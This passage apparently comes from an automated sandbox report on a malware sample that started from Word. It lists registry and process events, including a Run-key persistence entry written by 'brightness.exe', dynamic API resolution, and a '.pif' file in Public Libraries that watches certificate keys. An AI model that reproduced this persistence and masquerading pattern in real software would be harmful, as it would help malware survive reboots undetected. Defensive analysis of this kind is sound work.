          Source: C:\Windows\SysWOW64\brightness.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NsltarpnJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NsltarpnJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0291A954
          Source: C:\Users\Public\Libraries\npratlsN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\Public\Libraries\npratlsN.pifRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
